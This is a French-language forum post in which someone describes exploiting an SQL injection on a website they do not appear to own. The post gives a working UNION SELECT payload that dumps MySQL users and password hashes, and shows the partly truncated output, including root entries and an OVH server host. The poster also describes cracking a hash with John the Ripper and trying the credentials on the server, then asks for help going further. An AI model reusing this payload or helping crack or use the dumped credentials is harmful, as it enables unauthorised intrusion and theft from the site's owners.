Bonjour
En fouillant un peu sur un site, j'ai trouvé une faille de type injection SQL. J'ai réussi à afficher le nom des tables et leur contenu.
A tout hasard je tente d'afficher les mots de passe BDD avec la formule qui marche jamais :
UNION SELECT 1,2,3,4,5,6,7,8,group_concat(host,0x3a,user,0x3a,password) from mysql.user--
Et il me sort les mots de passe...
localhost:root:*263D2170B73A27145FB[tronqué]
ns000000.ovh.net:root:*263D2170B73A27145FBB[tronqué] (j'ai rajouté les 0 mais j'ai l'adresse complète OVH)
127.0.0.1:root:*263D2170B73A27145FBB5[tronqué]
%:tempo:*627DB5DCC5B5AD5BA94[tronqué]
localhost:nom_de_compte:*D6EA5B04F792AB4985CC72A[tronqué]
%:autre_nom_de_compte:*678E265E9481438F90A2477[tronqué]
62.4.16.%:dernier_nom_de_compte:6be769f24e0[tronqué]
J'ai plusieurs questions par rapport à ca.
Pourquoi les mots de passe sont il encrypté ? J'ai fait tourner JTR toute la nuit avec le premier MDP mais sans résultat
Loaded 1 password hash (Raw SHA1 [raw-sha1 SSE2])
Quand je vais à cette adresse "ns000000.ovh.net" il me demande login/pass. J'ai essayé toute les combinaisons trouvé plus et rien ne marche... Il y a aussi cette ligne qui ne ressemble pas au autre "62.4.16.%:dernier_nom_de_compte:6be769f24e0[tronqué]" qu'est ce que c'est ?
Merci d'avance pour vos réponses